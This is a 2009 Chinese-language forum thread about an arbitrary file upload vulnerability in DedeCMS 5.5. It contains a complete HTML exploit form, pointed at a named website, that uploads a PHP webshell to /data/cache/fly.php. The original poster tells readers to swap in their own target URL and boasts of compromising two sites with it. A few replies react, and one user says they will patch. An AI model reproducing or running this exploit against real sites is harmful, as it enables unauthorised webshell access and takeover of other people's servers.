dede5.5爆漏洞了!!我站被日了!(附带利用方法)

网络寄生虫 · 发表于 2009-10-27 00:20:54

http://www.sebug.net/vulndb/12518/

影响版本:
Dedecms 5.5漏洞描述:
漏洞产生文件位于include\dialog\select_soft_post.php，其变量$cfg_basedir没有正确初始化，导致可以饶过身份认证和系统变量初始化文件，导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考
by：Flyh4t
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
  <input type='hidden' name='activepath' value='/data/cache/' />
  <input type='hidden' name='cfg_basedir' value='../../' />
  <input type='hidden' name='cfg_imgtype' value='php' />
  <input type='hidden' name='cfg_not_allowall' value='txt' />
  <input type='hidden' name='cfg_softtype' value='php' />
  <input type='hidden' name='cfg_mediatype' value='php' />
  <input type='hidden' name='f' value='form1.enclosure' />
  <input type='hidden' name='job' value='upload' />
  <input type='hidden' name='newname' value='fly.php' />
  Select U Shell <input type='file' name='uploadfile' size='25' />
  <input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

网络寄生虫 · 发表于 2009-10-27 00:21:56

把以上代码改成 html url:改为目标站!

gdtv · 发表于 2009-10-27 00:22:12

遍地阳光 · 发表于 2009-10-27 00:22:28

看不懂。

遍地阳光 · 发表于 2009-10-27 00:23:14

我的还是5.3

网络寄生虫 · 发表于 2009-10-27 00:25:54

傻瓜利用方法!!

我很坏居然成功了2个网站

网络寄生虫 · 发表于 2009-10-27 00:28:53

今天才爆的

junhan · 发表于 2009-10-27 00:33:10

我站register_globals是关闭的`

啊猪同学 · 发表于 2009-10-27 00:36:00

靠。。我马上去更新。。

遍地阳光 · 发表于 2009-10-27 00:36:33

上传的文件跑哪里了》？

		自动登录	找回密码
密码			注册

[经验] dede5.5爆漏洞了!!我站被日了!(附带利用方法)

回复 7# 的帖子

浏览过的版块